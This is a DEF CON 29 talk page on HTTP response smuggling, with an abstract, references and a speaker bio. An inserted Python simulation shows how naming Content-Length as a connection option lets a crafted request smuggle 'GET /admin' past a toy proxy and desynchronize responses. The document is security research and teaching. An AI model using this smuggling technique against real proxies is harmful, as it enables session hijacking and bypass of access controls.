Response Smuggling: Pwning HTTP/1.1 Connections

Presented at DEF CON 29 (2021), Aug. 6, 2021, 6 p.m. (45 minutes)

Over the past few years, several novel presentations have re-introduced HTTP request smuggling and shown how to exploit it reliably against complex, multi-tier deployments. With advanced techniques, researchers were able to bypass restrictions and breach the security of critical web applications. This presentation takes a new approach, focusing on desynchronization of the response pipeline, a largely unexplored attack vector in HTTP smuggling.

First, I will introduce a desync variant that uses connection tokens (the option names carried in the Connection header) to hide arbitrary headers from the backend. This technique does not abuse a discrepancy between HTTP parsers; it relies instead on a vulnerability in the protocol itself. The issue was found and reported under Google's Vulnerability Reward Program and earned a nice bounty.

Next, I will show how to inject multiple messages at the backend server, mix up the order of the pipelined connection, and hijack user sessions from login requests.

Finally, using a novel technique called Response Scripting, I will demonstrate how to build malicious outbound messages from static responses used as building blocks. This will be leveraged to write custom responses and take control of one of the most popular protocols in history.

REFERENCES:
  • RFC 2616: Hypertext Transfer Protocol -- HTTP/1.1
  • RFC 7231: Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content
  • Chaim Linhart, Amit Klein, Ronen Heled, Steve Orrin: HTTP Request Smuggling
  • James Kettle: HTTP Desync Attacks: Request Smuggling Reborn
  • Emile Fugulin: HTTP Desync Attacks with Python and AWS
  • Amit Klein: HTTP Request Smuggling in 2020
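The connection-token behaviour the abstract refers to can be reproduced in a toy model. This is an added illustration, not code from the talk: RFC 7230 section 6.1 (and RFC 2616 section 14.10 before it) requires a proxy to remove every header field named in the Connection header before forwarding a message. The simulated front-end below follows that rule, so a client that lists Content-Length as a connection option makes the front-end frame one request while the backend, which never receives Content-Length, frames two. The hostnames, paths and the choice of Content-Length as the hidden header are this example's own assumptions, not claims about any particular product.

```python
"""Added simulation (not the talk's own code) of RFC 7230 s6.1 header
stripping at a proxy and the request-framing desync that follows when a
framing header is named as a connection option.  Hostnames, paths and the
hidden header are constructed for illustration."""

CRLF = b"\r\n"


def parse_one(stream: bytes):
    """Parse one request from the front of `stream` using Content-Length
    framing only (this toy model has no chunked encoding).
    Returns (request_line, [(name, value), ...], body, remaining_bytes)."""
    head, sep, rest = stream.partition(CRLF + CRLF)
    if not sep:
        raise ValueError("incomplete request head")
    lines = head.decode("ascii").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    length = 0  # a request with no Content-Length has an empty body
    for name, value in headers:
        if name.lower() == "content-length":
            length = int(value)
    body, remaining = rest[:length], rest[length:]
    return lines[0], headers, body, remaining


def parse_all(stream: bytes):
    """Split a whole byte stream into consecutive (pipelined) requests."""
    requests = []
    while stream:
        request_line, headers, body, stream = parse_one(stream)
        requests.append((request_line, headers, body))
    return requests


def serialize(request_line, headers, body):
    head = request_line + "\r\n" + "".join(f"{n}: {v}\r\n" for n, v in headers)
    return head.encode("ascii") + CRLF + body


def proxy_forward(stream: bytes) -> bytes:
    """Front-end behaviour: frame the client's request with its own
    Content-Length, then apply RFC 7230 s6.1: drop every header field whose
    name is listed as a connection option, and replace the hop-by-hop
    Connection header with the proxy's own."""
    forwarded = b""
    for request_line, headers, body in parse_all(stream):
        options = set()
        for name, value in headers:
            if name.lower() == "connection":
                options.update(o.strip().lower() for o in value.split(","))
        kept = [(n, v) for n, v in headers
                if n.lower() != "connection" and n.lower() not in options]
        kept.append(("Connection", "keep-alive"))
        forwarded += serialize(request_line, kept, body)
    return forwarded


def build_client_request() -> bytes:
    """Constructed attacker request: names Content-Length as a connection
    option so the proxy removes it, and carries a second request as body."""
    smuggled = b"GET /admin HTTP/1.1\r\nHost: example.test\r\n\r\n"
    head = (
        "POST /login HTTP/1.1\r\n"
        "Host: example.test\r\n"
        "Connection: keep-alive, Content-Length\r\n"
        f"Content-Length: {len(smuggled)}\r\n"
    )
    return head.encode("ascii") + CRLF + smuggled


def demo():
    """Return (request lines framed by the front-end, request lines framed
    by the backend) for the same client bytes."""
    raw = build_client_request()
    front = [r[0] for r in parse_all(raw)]
    back = [r[0] for r in parse_all(proxy_forward(raw))]
    return front, back


if __name__ == "__main__":
    front, back = demo()
    print("front-end framed:", front)
    print("backend framed:  ", back)
```

The front-end expects exactly one response on this backend connection, but the backend will write two. The surplus response stays queued on the reused connection and is read as the answer to whatever request the front-end sends there next, which is the response-pipeline desynchronization the abstract builds on.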


  • Martin Doyhenard - Security Researcher at Onapsis
    Martin is a security researcher at the Onapsis Research Labs. His work includes performing security assessments of SAP and Oracle products and detecting vulnerabilities in ERP systems. His research focuses on web stack security, reverse engineering and binary analysis, and he is also an active CTF player. Martin has spoken at conferences including RSA, Troopers, Hack In The Box and EkoParty, where he presented multiple critical vulnerabilities. @tincho_508

